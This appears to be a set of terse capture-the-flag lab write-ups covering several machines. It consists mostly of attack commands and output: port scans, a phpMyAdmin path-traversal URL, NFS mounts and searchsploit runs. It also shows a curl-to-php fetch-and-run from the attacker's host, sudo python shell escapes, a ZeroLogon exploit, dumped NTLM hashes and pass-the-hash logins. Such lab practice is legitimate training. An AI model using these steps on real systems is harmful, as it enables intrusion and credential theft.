My-WriteUps

  machine ip :172.31.1.17 my ip :10.10.0.33 portinformations tcp 80 22 631 udp 44380 5353 curl 172.31.1.17 |grep -E -o 'PMA_VERSION:"[[:digit:].]+"' 4.8.0 http://172.31.1.17//index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd brute url path /.htaccess (Status: 403) [Size: 276] /.htpasswd (Status: 403) [Size: 276] /.htaccess.php (Status: 403) [Size: 276] /.htpasswd.php (Status: 403) [Size: 276] /.htaccess.txt (Status: 403) [Size: 276] /.htpasswd.txt (Status: 403) [Size: 276] /ChangeLog (Status: 200) [Size: 19186] /README (Status: 200) [Size: 1520] /ajax.php (Status: 200) [Size: 10547] /changelog.php (Status: 200) [Size: 10542] /dev (Status: 200) [Size: 1138] /doc (Status: 200) [Size: 924] /export.php (Status: 200) [Size: 10541] we can find dev directory have a ping command pages and it can com...

machine ipaddress : 172.31.1.22 my ipaddress : 10.10.0.33 port informations Open 172.31.1.22:21 Open 172.31.1.22:22 Open 172.31.1.22:111 Open 172.31.1.22:2049 Open 172.31.1.22:34484 Open 172.31.1.22:43940 Open 172.31.1.22:43974 Open 172.31.1.22:50791 Open 172.31.1.22:57364 mount -t nfs 172.31.1.22:/var/nfsbackups ./hackme daniel:/bin/bash ways 1 to root os version : Ubuntu 12.04.5 LTS Linux version 3.13.0-32-generic flags access.txt : c3f5c15577e8d04d18ead19da6e9ea7a system.txt : 1d57710c976ac5da6092e60f852506b8

  machine ipaddress :172.31.1.26 port informations 172.31.1.26:22 172.31.1.26:53 172.31.1.26:80 https://www.exploit-db.com/exploits/48519 searchsploit -m 48442 python3 48442.py 8gf388d21bs08o7tkpqqupmb1j http://172.31.1.26/ 10.10.0.33 53 ways1 to root flags 551a538175c2cbfcbbd5d8d1a66800cc 1621f6c9650f47aee51b6b2e08505273 ways2 to root sudo -u pi /bin/bash to pi

ipaddress : 172.31.1.28 port informations Open 172.31.1.28:22 Open 172.31.1.28:80 searchsploit -m 47138 curl 10.10.0.33:81/2.txt|php ways to root flags 9f0668a3231303b55d593e6d61b1b902 8f382ca4acbc37411a38b055c0eb85d7

  ipaddress : 172.31.1.7 port open rustscan -a 172.31.1.7 -- Open 172.31.1.7:21 Open 172.31.1.7:80 Open 172.31.1.7:111 Open 172.31.1.7:2049 Open 172.31.1.7:27853 Open 172.31.1.7:41649 Open 172.31.1.7:60561 mount -t nfs 172.31.1.7:/home/amir ./hackme ways 1 ways 2 to amy sudo -u amy /usr/bin/python3 -c "import os;os.system('/bin/bash')" to root sudo -u amy /usr/bin/python3 -c "import os;os.system('/bin/bash')"

machine IP：172.31.1.4 my ip :10.10.0.33 port_informations rustscan -a 172.31.1.29 -- Open 172.31.1.4:53 Open 172.31.1.4:88 Open 172.31.1.4:135 Open 172.31.1.4:139 Open 172.31.1.4:389 Open 172.31.1.4:445 Open 172.31.1.4:464 Open 172.31.1.4:593 Open 172.31.1.4:636 Open 172.31.1.4:5985 Open 172.31.1.4:49666 Open 172.31.1.4:49669 Open 172.31.1.4:49668 Open 172.31.1.4:49670 Open 172.31.1.4:49676 Open 172.31.1.4:49702 information_gathering ldapsearch -x -s base namingcontexts -h 172.31.1.4 SECRET.org SECRET-DC get user list impacket-lookupsid anonymous@172.31.1.4 | tee user.txt 498: SECRET\Enterprise Read-only Domain Controllers (SidTypeGroup) 500: SECRET\Administrator (SidTypeUser) 501: SECRET\Guest (SidTypeUser) 502: SECRET\krbtgt (SidTypeUser) 512: SECRET\Domain Admins (SidTypeGroup) 513: SECRET\Domain Users (SidTypeGroup) 514: SECRET\Domain Guests (SidTypeGroup) 515: SECRET\Domain Computers (SidTypeGroup) 516: SECRET\Domain Controllers (SidTypeGroup) 517: SECRET\Cert Publishers (SidT...

ipaddress : 172.31.1.29 Table of Contents port open zero login port open rustscan -a 172.31 . 1.29 -- Open 172.31.1.29:53 Open 172.31.1.29:88 Open 172.31.1.29:135 Open 172.31.1.29:139 Open 172.31.1.29:389 Open 172.31.1.29:445 Open 172.31.1.29:464 Open 172.31.1.29:593 Open 172.31.1.29:636 Open 172.31.1.29:3268 Open 172.31.1.29:3269 Open 172.31.1.29:3389 Open 172.31.1.29:5985 Open 172.31.1.29:9389 ldapsearch -x -s base namingcontexts -h 172.31 . 1.29 Zero.local zero login python3 zeroLogon-NullPass.py ZERO-DC 172.31.1.29 impacket-secretsdump -just-dc ZERO-DC\$@172.31.1.29 Administrator:500:aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd267f39ccf990::: evil-winrm -i 172.31.1.29 -u 'administrator' -H '36242e2cb0b26d16fafd267f39ccf990'